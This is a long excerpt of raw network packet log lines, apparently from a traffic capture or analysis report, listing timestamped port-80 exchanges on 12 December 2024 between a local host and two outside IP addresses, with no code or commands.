                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.995969057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.996049881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.996481895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.996608973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.996689081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.997493029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.998086929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.998167992 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.998548031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.998558998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.998646975 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.999581099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.999878883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.999954939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.000545979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.001559973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.001569033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.001580000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.001636028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.001713991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.002556086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.003608942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.003618956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.003649950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.003699064 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.003739119 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.004568100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.005101919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.005191088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.005620003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.005780935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.005857944 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.006624937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.006741047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.006815910 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.007683039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.007694006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.007780075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.008703947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.009253025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.009354115 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.009649992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.056601048 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.098788023 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.098855019 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.098867893 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.098897934 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.099205971 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.099242926 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.099275112 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.099319935 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.100203991 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.100249052 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.100502014 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.100539923 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.101207018 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.101248026 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.101377964 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.101418018 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.102140903 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.102183104 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.102211952 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.102246046 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.103154898 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.103204012 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.103352070 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.103387117 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.104264975 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.104312897 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.104370117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.104417086 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.105062962 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.105098963 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.105190039 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.105223894 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.106071949 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.106101036 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.106116056 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.106129885 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.107033968 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.107075930 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.107137918 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.107173920 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.107995987 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.108036995 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.108095884 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.108133078 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.109005928 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.109040976 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.109266043 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.109297991 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.109963894 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.110001087 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.110398054 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.110440016 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.110929966 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.110968113 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.111041069 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.111076117 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.111951113 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.111995935 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.112415075 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.112459898 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.112875938 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.112919092 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.113074064 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.113106012 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.113907099 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.113934040 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.113946915 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.113966942 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.114871979 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.114912033 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.114979029 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.115016937 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.115899086 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.115938902 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.115993977 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.116033077 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.116813898 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.116863012 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.116935015 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.116974115 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.117786884 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.117832899 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.118670940 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.118715048 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.118802071 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.118813992 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.118838072 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.118855953 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.119704962 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.119746923 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.119940996 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.119980097 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.120723009 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.120763063 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.120764971 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.120800018 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.121673107 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.121716976 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.121726990 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.121762991 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.122667074 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.122719049 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.122761965 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.122798920 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.123671055 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.123719931 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.124033928 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.124077082 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.124655008 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.124670029 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.124700069 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.124713898 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.125688076 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.125737906 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.125766039 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.125802040 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.126669884 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.126714945 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.127111912 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.127154112 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.127540112 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.127583027 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.127816916 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.127856016 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.128597021 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.128634930 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.128869057 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.128901958 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.129508018 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.129545927 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.129894972 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.129933119 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.130461931 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.130497932 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.131557941 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.131570101 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.131581068 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.131603956 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.131619930 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.132410049 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.132452011 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.133426905 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.133440018 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.133450985 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.133472919 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.133497000 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.133497000 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.134386063 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.134429932 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.135065079 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.135101080 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.135426044 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.135462999 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.135642052 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.135684013 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.136385918 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.136425018 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.136511087 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.136547089 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.137320042 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.137356997 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.137499094 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.137542009 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.138339043 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.138381958 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.138412952 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.138448954 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.139322996 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.139362097 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.139452934 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.139488935 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.140269041 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.140321970 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.140521049 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.140554905 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.141211033 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.141256094 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.141257048 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.141290903 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.142206907 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.142231941 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.142254114 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.142271996 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.143249035 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.143294096 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.143465042 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.143506050 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.144146919 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.144196033 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.144277096 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.144315004 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.145139933 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.145184040 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.145299911 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.145342112 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.146148920 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.146200895 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.146867037 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.146915913 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.147072077 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.147109985 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.147150040 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.147185087 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.148035049 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.148086071 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.148165941 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.148204088 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149036884 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149049997 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149101973 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149101973 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149189949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149199963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149298906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149687052 CET8049946185.81.68.147192.168.2.10
